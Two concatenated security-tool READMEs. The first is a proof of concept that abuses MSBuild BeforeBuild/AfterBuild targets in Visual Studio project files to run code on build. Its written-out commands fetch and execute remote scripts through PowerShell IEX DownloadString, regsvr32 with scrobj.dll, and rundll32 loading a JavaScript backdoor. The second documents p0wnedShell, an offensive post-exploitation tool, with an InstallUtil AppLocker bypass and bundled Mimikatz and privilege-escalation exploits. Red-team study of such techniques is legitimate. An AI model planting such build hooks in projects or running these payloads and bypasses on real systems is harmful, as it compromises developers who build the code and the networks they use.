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Add my own POC to test Visual Studio trick to run code when building
Add my POC to test Visual Studio trick to run code when building
Author: 3gstudent
License: BSD 3-Clause
Test Success on Visual Studio 2008 and later.
All Visual Studio project include c++ c# vb and vf# can use this.
Download the code and build it :)
Miracle happened :)
Reference :
When I study the details about MSbuild Tasks,I produced an idea:
Could I change a normal C# project to run code when building?
I'm lucky that I've noticed the details about .csproj file and I have achieved my goal immediately:)
At the end of the .csproj file,there is a detail:
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
<Target Name="AfterBuild">
So I change this and add the following code:
<Target Name="AfterBuild">
<Exec Command="calc.exe"/>
Success to run calc.exe,but the build blocked.We must kill calc.exe,then build success.Like this:
We need powershell.
Upload my ps script:
Use the DownloadString of Powershell,code is:
<Target Name="AfterBuild">
<Exec Command="powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/3gstudent/test/master/calc.ps1');"/>
Then,we made it.
Use regsvr32.exe to run calc.exe
<Target Name="AfterBuild">
<Exec Command="regsvr32.exe /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll"/>
Console display error,but code execution success:
run jsrat:
<Target Name="AfterBuild">
<Exec Command="rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")"/>
The build blocked again.
Creat a js file to run jsrat.
<Target Name="BeforeBuild">
<Exec Command="echo GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")>1.js"/>
<Target Name="AfterBuild">
<Exec Command="1.js"/>
All Visual Studio project include c++/c#/vb/ vf# can use this.
Visual C++:
- .vcxproj
Visual Basic:
- .vbproj
Visual F#:
- .fsproj
《A dirty way of tricking users to bypass UAC》
PowerShell Runspace Post Exploitation Toolkit
Author: Cn33liz and Skons
License: BSD 3-Clause
What is it:
p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off), and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.
How to Compile it:
To compile p0wnedShell you need to import this project within Microsoft Visual Studio or if you don't have access to a Visual Studio installation, you can compile it as follows:
To Compile as x86 binary:
cd \Windows\Microsoft.NET\Framework\v4.0.30319
csc.exe /unsafe /reference:"C:\p0wnedShell\System.Management.Automation.dll" /reference:System.IO.Compression.dll /win32icon:C:\p0wnedShell\p0wnedShell.ico /out:C:\p0wnedShell\p0wnedShellx86.exe /platform:x86 "C:\p0wnedShell\*.cs"
To Compile as x64 binary:
cd \Windows\Microsoft.NET\Framework64\v4.0.30319
csc.exe /unsafe /reference:"C:\p0wnedShell\System.Management.Automation.dll" /reference:System.IO.Compression.dll /win32icon:C:\p0wnedShell\p0wnedShell.ico /out:C:\p0wnedShell\p0wnedShellx64.exe /platform:x64 "C:\p0wnedShell\*.cs"
p0wnedShell uses the System.Management.Automation namespace, so make sure you have the System.Management.Automation.dll within your source path when compiling outside of Visual Studio.
How to use it:
Just run the executables or...
To run as x86 binary and bypass Applocker (Credits for this great bypass go to Casey Smith aka subTee):
cd \Windows\Microsoft.NET\Framework\v4.0.30319 (Or newer .NET version folder)
InstallUtil.exe /logfile= /LogToConsole=false /U C:\p0wnedShell\p0wnedShellx86.exe
To run as x64 binary and bypass Applocker:
cd \Windows\Microsoft.NET\Framework64\v4.0.30319 (Or newer .NET version folder)
InstallUtil.exe /logfile= /LogToConsole=false /U C:\p0wnedShell\p0wnedShellx64.exe
What's inside the runspace:
The following PowerShell tools/functions are included:
- PowerSploit Invoke-Shellcode
- PowerSploit Invoke-ReflectivePEInjection
- PowerSploit Invoke-Mimikatz
- PowerSploit Invoke-TokenManipulation
- PowerSploit PowerUp
- PowerSploit PowerView
- HarmJ0y's Invoke-Psexec
- Besimorhino's PowerCat
- Nishang Invoke-PsUACme
- Nishang Invoke-Encode
- Nishang Get-PassHashes
- Nishang Invoke-CredentialsPhish
- Nishang Port-Scan
- Nishang Copy-VSS
- Kevin Robertson Invoke-Inveigh
- Kevin Robertson Tater
- FuzzySecurity Invoke-MS16-032
Powershell functions within the Runspace are loaded in memory from Base64 encode strings.
The following Binaries/tools are included:
- Benjamin DELPY's Mimikatz
- Benjamin DELPY's MS14-068 kekeo Exploit
- Didier Stevens modification of ReactOS Command Prompt
- MS14-058 Local SYSTEM Exploit
- hfiref0x MS15-051 Local SYSTEM Exploit
Binaries are loaded in memory using ReflectivePEInjection (Byte arrays are compressed using Gzip and saved within p0wnedShell as Base64 encoded strings).
p0wnedshell is heavily based on tools and knowledge from people like harmj0y, the guys from Powersploit, Sean Metcalf, SubTee, Nikhil Mittal, Besimorhino, Benjamin Delpy, Breenmachine, FoxGlove Security, Kevin Robertson, FuzzySecurity, James Forshaw and anyone else i forgot. So shout-outs go to them and of course to our friends in Redmond for giving us access to a very powerfull hacking language.
- Tab completion within the shell using TabExpansion2.
- More attacks (Overpass-the-hash, Kerberos Silver Tickets e.g.)
To report an issue or request a feature, feel free to contact me at:
Cornelis at
dePlaa.com or @Cn33lis